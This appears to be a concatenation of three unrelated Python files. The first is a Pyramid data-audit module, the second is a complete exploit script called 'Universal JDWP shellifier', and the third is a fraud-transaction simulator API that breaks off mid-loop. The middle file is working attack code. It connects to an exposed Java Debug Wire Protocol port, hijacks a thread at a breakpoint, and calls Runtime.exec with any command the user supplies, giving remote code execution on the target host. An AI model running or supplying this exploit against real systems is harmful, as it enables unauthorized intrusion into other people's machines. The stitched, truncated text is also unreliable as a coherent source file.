from pyramid.view import view_config
from .calculated import calculated_property
from .elasticsearch.interfaces import ICachedItem
from .interfaces import (
AUDITOR,
TYPES,
)
from .resources import Item
logger = logging.getLogger("__name__")
logger.setLevel(logging.ERROR)
def includeme(config):
config.include('.calculated')
config.include('.typeinfo')
config.scan(__name__)
config.registry[AUDITOR] = Auditor()
config.add_directive('add_audit_checker', add_audit_checker)
config.add_request_method(audit, 'audit')
# Same as logging
_levelNames = {
0: 'NOTSET',
10: 'DEBUG',
20: 'INFO',
30: 'INTERNAL_ACTION',
40: 'WARNING',
50: 'NOT_COMPLIANT',
60: 'ERROR',
'DEBUG': 10,
'ERROR': 60,
'INFO': 20,
'NOTSET': 0,
'WARNING': 40,
'NOT_COMPLIANT': 50,
'INTERNAL_ACTION': 30,
}
class AuditFailure(Exception):
def __init__(self, category, detail=None, level=0, path=None, name=None):
super(AuditFailure, self)
self.category = category
self.detail = detail
if not isinstance(level, int):
level = _levelNames[level]
self.level = level
self.path = path
self.name = name
def __json__(self, request=None):
return {
'category': self.category,
'detail': self.detail,
'level': self.level,
'level_name': _levelNames[self.level],
'path': self.path,
'name': self.name,
}
class Auditor(object):
""" Data audit manager
"""
_order = 0
def __init__(self):
self.type_checkers = {}
def add_audit_checker(self, checker, item_type, condition=None, frame='embedded'):
checkers = self.type_checkers.setdefault(item_type, [])
self._order += 1 # consistent execution ordering
if isinstance(frame, list):
frame = tuple(sorted(frame))
checkers.append((self._order, checker, condition, frame))
def audit(self, request, types, path, **kw):
if isinstance(types, basestring):
types = [types]
checkers = set()
checkers.update(*(self.type_checkers.get(item_type, ()) for item_type in types))
errors = []
system = {
'request': request,
'path': path,
'types': types,
}
system.update(kw)
for order, checker, condition, frame in sorted(checkers):
if frame is None:
uri = path
elif isinstance(frame, basestring):
uri = '%s@@%s' % (path, frame)
else:
uri = '%s@@expand?expand=%s' % (path, '&expand='.join(frame))
value = request.embed(uri)
if condition is not None:
try:
if not condition(value, system):
continue
except Exception as e:
detail = '%s: %r' % (checker.__name__, e)
failure = AuditFailure(
'audit condition error', detail, 'ERROR', path, checker.__name__)
errors.append(failure.__json__(request))
logger.warning('audit condition error auditing %s', path, exc_info=True)
continue
try:
try:
result = checker(value, system)
except AuditFailure as e:
e = e.__json__(request)
if e['path'] is None:
e['path'] = path
e['name'] = checker.__name__
errors.append(e)
continue
if result is None:
continue
if isinstance(result, AuditFailure):
result = [result]
for item in result:
if isinstance(item, AuditFailure):
item = item.__json__(request)
if item['path'] is None:
item['path'] = path
item['name'] = checker.__name__
errors.append(item)
continue
raise ValueError(item)
except Exception as e:
detail = '%s: %r' % (checker.__name__, e)
failure = AuditFailure(
'audit script error', detail, 'ERROR', path, checker.__name__)
errors.append(failure.__json__(request))
logger.warning('audit script error auditing %s', path, exc_info=True)
continue
return errors
# Imperative configuration
def add_audit_checker(config, checker, type_, condition=None, frame='embedded'):
def callback():
types = config.registry[TYPES]
ti = types[type_]
auditor = config.registry[AUDITOR]
auditor.add_audit_checker(checker, ti.name, condition, frame)
config.action(None, callback)
# Declarative configuration
def audit_checker(type_, condition=None, frame='embedded'):
""" Register an audit checker
"""
def decorate(checker):
def callback(scanner, factory_name, factory):
scanner.config.add_audit_checker(
checker, type_, condition, frame)
venusian.attach(checker, callback, category=AUDITOR)
return checker
return decorate
def audit(request, types=None, path=None, context=None, **kw):
auditor = request.registry[AUDITOR]
if path is None:
path = request.path
if context is None:
context = request.context
if types is None:
types = [context.type_info.name] + context.type_info.base_types
return auditor.audit(
request=request, types=types, path=path, root=request.root, context=context,
registry=request.registry, **kw)
# Views
def traversed_path_ids(request, obj, path):
if isinstance(path, basestring):
path = path.split('.')
if not path:
yield obj if isinstance(obj, basestring) else obj['@id']
return
name = path[0]
remaining = path[1:]
value = obj.get(name, None)
if value is None:
return
if not isinstance(value, list):
value = [value]
for member in value:
if remaining and isinstance(member, basestring):
member = request.embed(member, '@@object')
for item_uri in traversed_path_ids(request, member, remaining):
yield item_uri
def inherit_audits(request, embedded, embedded_paths):
audit_paths = {embedded['@id']}
for embedded_path in embedded_paths:
audit_paths.update(traversed_path_ids(request, embedded, embedded_path))
audits = {}
for audit_path in audit_paths:
result = request.embed(audit_path, '@@audit-self')
for audit in result['audit']:
if audit['level_name'] in audits:
audits[audit['level_name']].append(audit)
else:
audits[audit['level_name']] = [audit]
return audits
@view_config(context=Item, permission='audit', request_method='GET',
name='audit-self')
def item_view_audit_self(context, request):
path = request.resource_path(context)
types = [context.type_info.name] + context.type_info.base_types
return {
'@id': path,
'audit': request.audit(types=types, path=path),
}
@view_config(context=Item, permission='audit', request_method='GET',
name='audit')
def item_view_audit(context, request):
path = request.resource_path(context)
properties = request.embed(path, '@@object')
inherit = context.audit_inherit
embedded_paths = context.embedded_paths()
if embedded_paths and '*' in context.audit_inherit:
inherit = embedded_paths
else:
inherit = context.audit_inherit or []
audit = inherit_audits(request, properties, inherit)
return {
'@id': path,
'audit': audit,
}
def audit_condition(context, request):
# Audits must be explicitly requested if they
# are not available in precached form from elasticsearch
force_audit = request.params.get('audit', False)
if not ICachedItem.providedBy(context) and not force_audit:
return False
# Don't embed audits unless user has permission to see them
if not request.has_permission('audit'):
return False
return True
@calculated_property(context=Item, category='page', name='audit',
condition=audit_condition)
def audit_property(context, request):
path = request.resource_path(context)
return request.embed(path, '@@audit')['audit']
|
|
#!/usr/bin/python
################################################################################
#
# Universal JDWP shellifier
#
# @_hugsy_
#
# And special cheers to @lanjelot
#
import socket
import time
import sys
import struct
import urllib
import argparse
################################################################################
#
# JDWP protocol variables
#
HANDSHAKE = "JDWP-Handshake"
REQUEST_PACKET_TYPE = 0x00
REPLY_PACKET_TYPE = 0x80
# Command signatures
VERSION_SIG = (1, 1)
CLASSESBYSIGNATURE_SIG = (1, 2)
ALLCLASSES_SIG = (1, 3)
ALLTHREADS_SIG = (1, 4)
IDSIZES_SIG = (1, 7)
CREATESTRING_SIG = (1, 11)
SUSPENDVM_SIG = (1, 8)
RESUMEVM_SIG = (1, 9)
SIGNATURE_SIG = (2, 1)
FIELDS_SIG = (2, 4)
METHODS_SIG = (2, 5)
GETVALUES_SIG = (2, 6)
CLASSOBJECT_SIG = (2, 11)
INVOKESTATICMETHOD_SIG = (3, 3)
REFERENCETYPE_SIG = (9, 1)
INVOKEMETHOD_SIG = (9, 6)
STRINGVALUE_SIG = (10, 1)
THREADNAME_SIG = (11, 1)
THREADSUSPEND_SIG = (11, 2)
THREADRESUME_SIG = (11, 3)
THREADSTATUS_SIG = (11, 4)
EVENTSET_SIG = (15, 1)
EVENTCLEAR_SIG = (15, 2)
EVENTCLEARALL_SIG = (15, 3)
# Other codes
MODKIND_COUNT = 1
MODKIND_THREADONLY = 2
MODKIND_CLASSMATCH = 5
MODKIND_LOCATIONONLY = 7
EVENT_BREAKPOINT = 2
SUSPEND_EVENTTHREAD = 1
SUSPEND_ALL = 2
NOT_IMPLEMENTED = 99
VM_DEAD = 112
INVOKE_SINGLE_THREADED = 2
TAG_OBJECT = 76
TAG_STRING = 115
TYPE_CLASS = 1
################################################################################
#
# JDWP client class
#
class JDWPClient:
def __init__(self, host, port=8000):
self.host = host
self.port = port
self.methods = {}
self.fields = {}
self.id = 0x01
return
def create_packet(self, cmdsig, data=""):
flags = 0x00
cmdset, cmd = cmdsig
pktlen = len(data) + 11
pkt = struct.pack(">IIccc", pktlen, self.id, chr(flags), chr(cmdset), chr(cmd))
pkt+= data
self.id += 2
return pkt
def read_reply(self):
header = self.socket.recv(11)
pktlen, id, flags, errcode = struct.unpack(">IIcH", header)
if flags == chr(REPLY_PACKET_TYPE):
if errcode :
raise Exception("Received errcode %d" % errcode)
buf = ""
while len(buf) + 11 < pktlen:
data = self.socket.recv(1024)
if len(data):
buf += data
else:
time.sleep(1)
return buf
def parse_entries(self, buf, formats, explicit=True):
entries = []
index = 0
if explicit:
nb_entries = struct.unpack(">I", buf[:4])[0]
buf = buf[4:]
else:
nb_entries = 1
for i in range(nb_entries):
data = {}
for fmt, name in formats:
if fmt == "L" or fmt == 8:
data[name] = int(struct.unpack(">Q",buf[index:index+8]) [0])
index += 8
elif fmt == "I" or fmt == 4:
data[name] = int(struct.unpack(">I", buf[index:index+4])[0])
index += 4
elif fmt == 'S':
l = struct.unpack(">I", buf[index:index+4])[0]
data[name] = buf[index+4:index+4+l]
index += 4+l
elif fmt == 'C':
data[name] = ord(struct.unpack(">c", buf[index])[0])
index += 1
elif fmt == 'Z':
t = ord(struct.unpack(">c", buf[index])[0])
if t == 115:
s = self.solve_string(buf[index+1:index+9])
data[name] = s
index+=9
elif t == 73:
data[name] = struct.unpack(">I", buf[index+1:index+5])[0]
buf = struct.unpack(">I", buf[index+5:index+9])
index=0
else:
print "Error"
sys.exit(1)
entries.append( data )
return entries
def format(self, fmt, value):
if fmt == "L" or fmt == 8:
return struct.pack(">Q", value)
elif fmt == "I" or fmt == 4:
return struct.pack(">I", value)
raise Exception("Unknown format")
def unformat(self, fmt, value):
if fmt == "L" or fmt == 8:
return struct.unpack(">Q", value[:8])[0]
elif fmt == "I" or fmt == 4:
return struct.unpack(">I", value[:4])[0]
else:
raise Exception("Unknown format")
return
def start(self):
self.handshake(self.host, self.port)
self.idsizes()
self.getversion()
self.allclasses()
return
def handshake(self, host, port):
s = socket.socket()
try:
s.connect( (host, port) )
except socket.error as msg:
raise Exception("Failed to connect: %s" % msg)
s.send( HANDSHAKE )
if s.recv( len(HANDSHAKE) ) != HANDSHAKE:
raise Exception("Failed to handshake")
else:
self.socket = s
return
def leave(self):
self.socket.close()
return
def getversion(self):
self.socket.sendall( self.create_packet(VERSION_SIG) )
buf = self.read_reply()
formats = [ ('S', "description"), ('I', "jdwpMajor"), ('I', "jdwpMinor"),
('S', "vmVersion"), ('S', "vmName"), ]
for entry in self.parse_entries(buf, formats, False):
for name,value in entry.iteritems():
setattr(self, name, value)
return
@property
def version(self):
return "%s - %s" % (self.vmName, self.vmVersion)
def idsizes(self):
self.socket.sendall( self.create_packet(IDSIZES_SIG) )
buf = self.read_reply()
formats = [ ("I", "fieldIDSize"), ("I", "methodIDSize"), ("I", "objectIDSize"),
("I", "referenceTypeIDSize"), ("I", "frameIDSize") ]
for entry in self.parse_entries(buf, formats, False):
for name,value in entry.iteritems():
setattr(self, name, value)
return
def allthreads(self):
try:
getattr(self, "threads")
except :
self.socket.sendall( self.create_packet(ALLTHREADS_SIG) )
buf = self.read_reply()
formats = [ (self.objectIDSize, "threadId")]
self.threads = self.parse_entries(buf, formats)
finally:
return self.threads
def get_thread_by_name(self, name):
self.allthreads()
for t in self.threads:
threadId = self.format(self.objectIDSize, t["threadId"])
self.socket.sendall( self.create_packet(THREADNAME_SIG, data=threadId) )
buf = self.read_reply()
if len(buf) and name == self.readstring(buf):
return t
return None
def allclasses(self):
try:
getattr(self, "classes")
except:
self.socket.sendall( self.create_packet(ALLCLASSES_SIG) )
buf = self.read_reply()
formats = [ ('C', "refTypeTag"),
(self.referenceTypeIDSize, "refTypeId"),
('S', "signature"),
('I', "status")]
self.classes = self.parse_entries(buf, formats)
return self.classes
def get_class_by_name(self, name):
for entry in self.classes:
if entry["signature"].lower() == name.lower() :
return entry
return None
def get_methods(self, refTypeId):
if not self.methods.has_key(refTypeId):
refId = self.format(self.referenceTypeIDSize, refTypeId)
self.socket.sendall( self.create_packet(METHODS_SIG, data=refId) )
buf = self.read_reply()
formats = [ (self.methodIDSize, "methodId"),
('S', "name"),
('S', "signature"),
('I', "modBits")]
self.methods[refTypeId] = self.parse_entries(buf, formats)
return self.methods[refTypeId]
def get_method_by_name(self, name):
for refId in self.methods.keys():
for entry in self.methods[refId]:
if entry["name"].lower() == name.lower() :
return entry
return None
def getfields(self, refTypeId):
if not self.fields.has_key( refTypeId ):
refId = self.format(self.referenceTypeIDSize, refTypeId)
self.socket.sendall( self.create_packet(FIELDS_SIG, data=refId) )
buf = self.read_reply()
formats = [ (self.fieldIDSize, "fieldId"),
('S', "name"),
('S', "signature"),
('I', "modbits")]
self.fields[refTypeId] = self.parse_entries(buf, formats)
return self.fields[refTypeId]
def getvalue(self, refTypeId, fieldId):
data = self.format(self.referenceTypeIDSize, refTypeId)
data+= struct.pack(">I", 1)
data+= self.format(self.fieldIDSize, fieldId)
self.socket.sendall( self.create_packet(GETVALUES_SIG, data=data) )
buf = self.read_reply()
formats = [ ("Z", "value") ]
field = self.parse_entries(buf, formats)[0]
return field
def createstring(self, data):
buf = self.buildstring(data)
self.socket.sendall( self.create_packet(CREATESTRING_SIG, data=buf) )
buf = self.read_reply()
return self.parse_entries(buf, [(self.objectIDSize, "objId")], False)
def buildstring(self, data):
return struct.pack(">I", len(data)) + data
def readstring(self, data):
size = struct.unpack(">I", data[:4])[0]
return data[4:4+size]
def suspendvm(self):
self.socket.sendall( self.create_packet( SUSPENDVM_SIG ) )
self.read_reply()
return
def resumevm(self):
self.socket.sendall( self.create_packet( RESUMEVM_SIG ) )
self.read_reply()
return
def invokestatic(self, classId, threadId, methId, *args):
data = self.format(self.referenceTypeIDSize, classId)
data+= self.format(self.objectIDSize, threadId)
data+= self.format(self.methodIDSize, methId)
data+= struct.pack(">I", len(args))
for arg in args:
data+= arg
data+= struct.pack(">I", 0)
self.socket.sendall( self.create_packet(INVOKESTATICMETHOD_SIG, data=data) )
buf = self.read_reply()
return buf
def invoke(self, objId, threadId, classId, methId, *args):
data = self.format(self.objectIDSize, objId)
data+= self.format(self.objectIDSize, threadId)
data+= self.format(self.referenceTypeIDSize, classId)
data+= self.format(self.methodIDSize, methId)
data+= struct.pack(">I", len(args))
for arg in args:
data+= arg
data+= struct.pack(">I", 0)
self.socket.sendall( self.create_packet(INVOKEMETHOD_SIG, data=data) )
buf = self.read_reply()
return buf
def solve_string(self, objId):
self.socket.sendall( self.create_packet(STRINGVALUE_SIG, data=objId) )
buf = self.read_reply()
if len(buf):
return self.readstring(buf)
else:
return ""
def query_thread(self, threadId, kind):
data = self.format(self.objectIDSize, threadId)
self.socket.sendall( self.create_packet(kind, data=data) )
buf = self.read_reply()
return
def suspend_thread(self, threadId):
return self.query_thread(threadId, THREADSUSPEND_SIG)
def status_thread(self, threadId):
return self.query_thread(threadId, THREADSTATUS_SIG)
def resume_thread(self, threadId):
return self.query_thread(threadId, THREADRESUME_SIG)
def send_event(self, eventCode, *args):
data = ""
data+= chr( eventCode )
data+= chr( SUSPEND_ALL )
data+= struct.pack(">I", len(args))
for kind, option in args:
data+= chr( kind )
data+= option
self.socket.sendall( self.create_packet(EVENTSET_SIG, data=data) )
buf = self.read_reply()
return struct.unpack(">I", buf)[0]
def clear_event(self, eventCode, rId):
data = chr(eventCode)
data+= struct.pack(">I", rId)
self.socket.sendall( self.create_packet(EVENTCLEAR_SIG, data=data) )
self.read_reply()
return
def clear_events(self):
self.socket.sendall( self.create_packet(EVENTCLEARALL_SIG) )
self.read_reply()
return
def wait_for_event(self):
buf = self.read_reply()
return buf
def parse_event_breakpoint(self, buf, eventId):
num = struct.unpack(">I", buf[2:6])[0]
rId = struct.unpack(">I", buf[6:10])[0]
if rId != eventId:
return None
tId = self.unformat(self.objectIDSize, buf[10:10+self.objectIDSize])
loc = -1 # don't care
return rId, tId, loc
def runtime_exec(jdwp, args):
print ("[+] Targeting '%s:%d'" % (args.target, args.port))
print ("[+] Reading settings for '%s'" % jdwp.version)
# 1. get Runtime class reference
runtimeClass = jdwp.get_class_by_name("Ljava/lang/Runtime;")
if runtimeClass is None:
print ("[-] Cannot find class Runtime")
return False
print ("[+] Found Runtime class: id=%x" % runtimeClass["refTypeId"])
# 2. get getRuntime() meth reference
jdwp.get_methods(runtimeClass["refTypeId"])
getRuntimeMeth = jdwp.get_method_by_name("getRuntime")
if getRuntimeMeth is None:
print ("[-] Cannot find method Runtime.getRuntime()")
return False
print ("[+] Found Runtime.getRuntime(): id=%x" % getRuntimeMeth["methodId"])
# 3. setup breakpoint on frequently called method
c = jdwp.get_class_by_name( args.break_on_class )
if c is None:
print("[-] Could not access class '%s'" % args.break_on_class)
print("[-] It is possible that this class is not used by application")
print("[-] Test with another one with option `--break-on`")
return False
jdwp.get_methods( c["refTypeId"] )
m = jdwp.get_method_by_name( args.break_on_method )
if m is None:
print("[-] Could not access method '%s'" % args.break_on)
return False
loc = chr( TYPE_CLASS )
loc+= jdwp.format( jdwp.referenceTypeIDSize, c["refTypeId"] )
loc+= jdwp.format( jdwp.methodIDSize, m["methodId"] )
loc+= struct.pack(">II", 0, 0)
data = [ (MODKIND_LOCATIONONLY, loc), ]
rId = jdwp.send_event( EVENT_BREAKPOINT, *data )
print ("[+] Created break event id=%x" % rId)
# 4. resume vm and wait for event
jdwp.resumevm()
print ("[+] Waiting for an event on '%s'" % args.break_on)
while True:
buf = jdwp.wait_for_event()
ret = jdwp.parse_event_breakpoint(buf, rId)
if ret is not None:
break
rId, tId, loc = ret
print ("[+] Received matching event from thread %#x" % tId)
jdwp.clear_event(EVENT_BREAKPOINT, rId)
# 5. Now we can execute any code
if args.cmd:
runtime_exec_payload(jdwp, tId, runtimeClass["refTypeId"], getRuntimeMeth["methodId"], args.cmd)
else:
# by default, only prints out few system properties
runtime_exec_info(jdwp, tId)
jdwp.resumevm()
print ("[!] Command successfully executed")
return True
def runtime_exec_info(jdwp, threadId):
#
# This function calls java.lang.System.getProperties() and
# displays OS properties (non-intrusive)
#
properties = {"java.version": "Java Runtime Environment version",
"java.vendor": "Java Runtime Environment vendor",
"java.vendor.url": "Java vendor URL",
"java.home": "Java installation directory",
"java.vm.specification.version": "Java Virtual Machine specification version",
"java.vm.specification.vendor": "Java Virtual Machine specification vendor",
"java.vm.specification.name": "Java Virtual Machine specification name",
"java.vm.version": "Java Virtual Machine implementation version",
"java.vm.vendor": "Java Virtual Machine implementation vendor",
"java.vm.name": "Java Virtual Machine implementation name",
"java.specification.version": "Java Runtime Environment specification version",
"java.specification.vendor": "Java Runtime Environment specification vendor",
"java.specification.name": "Java Runtime Environment specification name",
"java.class.version": "Java class format version number",
"java.class.path": "Java class path",
"java.library.path": "List of paths to search when loading libraries",
"java.io.tmpdir": "Default temp file path",
"java.compiler": "Name of JIT compiler to use",
"java.ext.dirs": "Path of extension directory or directories",
"os.name": "Operating system name",
"os.arch": "Operating system architecture",
"os.version": "Operating system version",
"file.separator": "File separator",
"path.separator": "Path separator",
"user.name": "User's account name",
"user.home": "User's home directory",
"user.dir": "User's current working directory"
}
systemClass = jdwp.get_class_by_name("Ljava/lang/System;")
if systemClass is None:
print ("[-] Cannot find class java.lang.System")
return False
jdwp.get_methods(systemClass["refTypeId"])
getPropertyMeth = jdwp.get_method_by_name("getProperty")
if getPropertyMeth is None:
print ("[-] Cannot find method System.getProperty()")
return False
for propStr, propDesc in properties.iteritems():
propObjIds = jdwp.createstring(propStr)
if len(propObjIds) == 0:
print ("[-] Failed to allocate command")
return False
propObjId = propObjIds[0]["objId"]
data = [ chr(TAG_OBJECT) + jdwp.format(jdwp.objectIDSize, propObjId), ]
buf = jdwp.invokestatic(systemClass["refTypeId"],
threadId,
getPropertyMeth["methodId"],
*data)
if buf[0] != chr(TAG_STRING):
print ("[-] %s: Unexpected returned type: expecting String" % propStr)
else:
retId = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize])
res = cli.solve_string(jdwp.format(jdwp.objectIDSize, retId))
print ("[+] Found %s '%s'" % (propDesc, res))
return True
def runtime_exec_payload(jdwp, threadId, runtimeClassId, getRuntimeMethId, command):
#
# This function will invoke command as a payload, which will be running
# with JVM privilege on host (intrusive).
#
print ("[+] Selected payload '%s'" % command)
# 1. allocating string containing our command to exec()
cmdObjIds = jdwp.createstring( command )
if len(cmdObjIds) == 0:
print ("[-] Failed to allocate command")
return False
cmdObjId = cmdObjIds[0]["objId"]
print ("[+] Command string object created id:%x" % cmdObjId)
# 2. use context to get Runtime object
buf = jdwp.invokestatic(runtimeClassId, threadId, getRuntimeMethId)
if buf[0] != chr(TAG_OBJECT):
print ("[-] Unexpected returned type: expecting Object")
return False
rt = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize])
if rt is None:
print "[-] Failed to invoke Runtime.getRuntime()"
return False
print ("[+] Runtime.getRuntime() returned context id:%#x" % rt)
# 3. find exec() method
execMeth = jdwp.get_method_by_name("exec")
if execMeth is None:
print ("[-] Cannot find method Runtime.exec()")
return False
print ("[+] found Runtime.exec(): id=%x" % execMeth["methodId"])
# 4. call exec() in this context with the alloc-ed string
data = [ chr(TAG_OBJECT) + jdwp.format(jdwp.objectIDSize, cmdObjId) ]
buf = jdwp.invoke(rt, threadId, runtimeClassId, execMeth["methodId"], *data)
if buf[0] != chr(TAG_OBJECT):
print ("[-] Unexpected returned type: expecting Object")
return False
retId = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize])
print ("[+] Runtime.exec() successful, retId=%x" % retId)
return True
def str2fqclass(s):
i = s.rfind('.')
if i == -1:
print("Cannot parse path")
sys.exit(1)
method = s[i:][1:]
classname = 'L' + s[:i].replace('.', '/') + ';'
return classname, method
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Universal exploitation script for JDWP by @_hugsy_",
formatter_class=argparse.ArgumentDefaultsHelpFormatter )
parser.add_argument("-t", "--target", type=str, metavar="IP", help="Remote target IP", required=True)
parser.add_argument("-p", "--port", type=int, metavar="PORT", default=8000, help="Remote target port")
parser.add_argument("--break-on", dest="break_on", type=str, metavar="JAVA_METHOD",
default="java.net.ServerSocket.accept", help="Specify full path to method to break on")
parser.add_argument("--cmd", dest="cmd", type=str, metavar="COMMAND",
help="Specify full path to method to break on")
args = parser.parse_args()
classname, meth = str2fqclass(args.break_on)
setattr(args, "break_on_class", classname)
setattr(args, "break_on_method", meth)
retcode = 0
try:
cli = JDWPClient(args.target, args.port)
cli.start()
if runtime_exec(cli, args) == False:
print ("[-] Exploit failed")
retcode = 1
except KeyboardInterrupt:
print ("[+] Exiting on user's request")
except Exception as e:
print ("[-] Exception: %s" % e)
retcode = 1
cli = None
finally:
if cli:
cli.leave()
sys.exit(retcode)
|
|
"""
This module provides an online API for the Unimaus Simulator. This can be useful in cases where
we want to have other code interacting with the simulator online, and don't necessarily need to
store the generated data in a file.
For a simple example of usage, see __main__ code at the bottom of this module.
@author Dennis Soemers (only the online API: Luisa Zintgraf developed the original simulator)
"""
from datetime import datetime
from data.features.aggregate_features import AggregateFeatures
from data.features.apate_graph_features import ApateGraphFeatures
from mesa.time import BaseScheduler
from simulator import parameters
from simulator.transaction_model import TransactionModel
class OnlineUnimaus:
def __init__(self, seed=123, stay_prob_genuine=0.9, stay_prob_fraud=0.99,
end_date=datetime(2999, 12, 31), params=None, random_schedule=False):
"""
Creates an object that can be used to run the simulator online / interactively. This means
that we can have it generate a bit of data, do something with the data, generate a bit more
data, do something again, etc. (as opposed to, generating one large batch of data, storing it
in a file, and then using it in a different program).
:param end_date:
Final possible date in the simulation. By default set to 31st December 2999, which allows for
a sufficiently long simulation run. If set to anything other than None, will override the
end_date as specified in params
:param params:
Parameters passed on to the UniMausTransactionModel. Will use the default parameters if None
:param random_schedule:
False by default. If set to True, we use a RandomActivation schedule to shuffle the order in
which agents are updated every step.
"""
if params is None:
params = parameters.get_default_parameters()
if end_date is not None:
params['end_date'] = end_date
if stay_prob_genuine is not None:
params['stay_prob'][0] = stay_prob_genuine
if stay_prob_fraud is not None:
params['stay_prob'][1] = stay_prob_fraud
if seed is not None:
params['seed'] = seed
if random_schedule:
self.model = TransactionModel(params)
else:
self.model = TransactionModel(params, scheduler=BaseScheduler(None))
self.params = params
self.aggregate_feature_constructor = None
self.apate_graph_feature_constructor = None
def block_cards(self, card_ids, replace_fraudsters=True):
"""
Blocks the given list of Card IDs (removing all genuine and fraudulent customers with matching
Card IDs from the simulation).
NOTE: This function is only intended to be called using Card IDs that are 100% known to have
been involved in fraudulent transactions. If the list contains more than a single Card ID,
and the Card ID has not been used in any fraudulent transactions, the function may not be able
to find the matching customer (due to an optimization in the implementation)
:param card_ids:
List of one or more Card IDs to block
:param replace_fraudsters:
If True, also replaces the banned fraudsters by an equal number of new fraudsters. True by default
"""
n = len(card_ids)
'''
print("block_cards called!")
if n == 0:
print("Not blocking anything")
for card_id in card_ids:
print("Blocking ", card_id)
'''
if n == 0:
# nothing to do
return
num_banned_fraudsters = 0
if n == 1:
# most efficient implementation in this case is simply to loop once through all customers (fraudulent
# as well as genuine) and compare to our single blocked card ID
blocked_card_id = card_ids[0]
for customer in self.model.customers:
if customer.card_id == blocked_card_id:
customer.stay = False
# should not be any more customers with same card ID, so can break
break
for fraudster in self.model.fraudsters:
if fraudster.card_id == blocked_card_id:
fraudster.stay = False
num_banned_fraudsters += 1
# should not be any more fraudsters with same card ID, so can break
break
else:
# with naive implementation, we'd have n loops through the entire list of customers, which may be expensive
# instead, we loop through it once to collect only those customers with corrupted cards. Then, we follow
# up with n loops through that much smaller list of customers with corrupted cards
compromised_customers = [c for c in self.model.customers if c.card_corrupted]
for blocked_card_id in card_ids:
for customer in compromised_customers:
if customer.card_id == blocked_card_id:
customer.stay = False
# should not be any more customers with same card ID, so can break
break
for fraudster in self.model.fraudsters:
if fraudster.card_id == blocked_card_id:
fraudster.stay = False
num_banned_fraudsters += 1
# should not be any more fraudsters with same card ID, so can break
break
if replace_fraudsters:
self.model.add_fraudsters(num_banned_fraudsters)
def clear_log(self):
"""
Clears all transactions generated so far from memory
"""
agent_vars = self.model.log_collector.agent_vars
for reporter_name in agent_vars:
agent_vars[reporter_name] = []
def get_log(self, clear_after=True):
"""
Returns a log (in the form of a pandas dataframe) of the transactions generated so far.
:param clear_after:
If True, will clear the transactions from memory. This means that subsequent calls to get_log()
will no longer include the transactions that have already been returned in a previous call.
:return:
The logged transactions. Returns None if no transactions were logged
"""
log = self.model.log_collector.get_agent_vars_dataframe()
if log is None:
return None
log.reset_index(drop=True, inplace=True)
if clear_after:
self.clear_log()
return log
def get_params_string(self):
"""
Returns a single string describing all of our param values.
:return:
"""
output = ""
for key in self.params:
output += str(key) + ":" + str(self.params[key]) + "-"
return output
def get_seed_str(self):
return str(self.params['seed'])
def get_stay_prob_genuine_str(self):
return str(self.params['stay_prob'][0])
def get_stay_prob_fraud_str(self):
return str(self.params['stay_prob'][1])
def step_simulator(self, num_steps=1):
"""
Runs num_steps steps of the simulator (simulates num_steps hours of transactions)
:param num_steps:
The number of steps to run. 1 by default.
:return:
True if we successfully simulated a step, false otherwise
"""
for step in range(num_steps):
if self.model.terminated:
print("WARNING: cannot step simulator because model is already terminated. ",
"Specify a later end_date in params to allow for a longer simulation.")
return False
self.model.step()
return True
def prepare_feature_constructors(self, data):
"""
Prepares feature constructors (objects which can compute new features for us) using
a given set of ''training data''. The training data passed into this function should
NOT be re-used when training predictive models using the new features, because the new
features will likely be unrealistically accurate on this data (and therefore models
trained on this data would learn to rely on the new features too much)
:param data:
Data used to ''learn'' features
"""
self.aggregate_feature_constructor = AggregateFeatures(data)
self.apate_graph_feature_constructor = ApateGraphFeatures(data)
def print_debug_info(self, data):
"""
Useful to call from Java, so that we can observe a dataset we want to debug through Python and easily
print info about it
:param data:
Dataset we want to know more about
"""
print("----- print_debug_info called! -----")
if data is None:
print("data is None")
else:
print("data is not None")
print(data.head())
print("num fraudulent transactions in data = ", data.loc[data["Target"] == 1].shape[0])
def process_data(self, data):
"""
Processes the given data, so that it will be ready for use in Machine Learning models. New features
are added by the feature constructors, features which are no longer necessary afterwards are removed,
and the Target feature is moved to the back of the dataframe
NOTE: processing is done in-place
:param data:
Data to process
:return:
Processed dataframe
"""
self.apate_graph_feature_constructor.add_graph_features(data)
self.aggregate_feature_constructor.add_aggregate_features(data)
# remove non-numeric columns / columns we don't need after adding features
data.drop(["Global_Date", "Local_Date", "MerchantID", "Currency", "Country",
"AuthSteps", "TransactionCancelled", "TransactionSuccessful"],
inplace=True, axis=1)
# move CardID and Target columns to the end
data = data[[col for col in data if col != "Target" and col != "CardID"] + ["CardID", "Target"]]
return data
def update_feature_constructors_unlabeled(self, data):
"""
Performs an update of existing feature constructors, treating the given new data
as being unlabeled.
:param data:
(unlabeled) new data (should NOT have been passed into prepare_feature_constructors() previously)
"""
self.aggregate_feature_constructor.update_unlabeled(data)
class DataLogWrapper:
def __init__(self, dataframe):
"""
Constructs a wrapper for a data log (in a dataframe). Provides some useful functions to make
it easier to access this data from Java through jpy. This class is probably not very useful in
pure Python.
:param dataframe:
The dataframe to wrap in an object
"""
self.dataframe = dataframe
def get_column_names(self):
"""
Returns a list of column names
:return:
List of column names
"""
return self.dataframe.columns
def get_data_list(self):
"""
Returns a flat list representation of the dataframe
:return:
"""
return [item for sublist in self.dataframe.as_matrix().tolist() for item in sublist]
def get_num_cols(self):
"""
Returns the number of columns in the dataframe
:return:
The number of columns in the dataframe
"""
return self.dataframe.shape[1]
def get_num_rows(self):
"""
Returns the number of rows in the dataframe
:return:
The number of rows in the dataframe
"""
return self.dataframe.shape[0]
if __name__ == '__main__':
# construct our online simulator
simulator = OnlineUnimaus()
# change this value to change how often we run code inside the loop.
# with n_steps = 1, we run code after every hour of transactions.
# with n_steps = 2 for example, we would only run code every 2 steps
n_steps = 1
# if this is set to False, our simulator will not clear logged transactions after returning them from get_log.
# This would mean that subsequent get_log calls would also return transactions that we've already seen earlier
clear_logs_after_return = True
# if this is set to True, we block card IDs as soon as we observe them being involved in fraudulent transactions
# (we cheat a bit here by simply observing all true labels, this is just an example usage of API)
block_fraudsters = True
# keep running until we fail (which will be after 1 year due to end_date in default parameters)
while simulator.step_simulator(n_steps):
# get all transactions generated by the last n_steps (or all steps if clear_logs_after_return == False)
data_log = simulator.get_log(clear_after=clear_logs_after_return)
if data_log is not None:
#print(data_log)
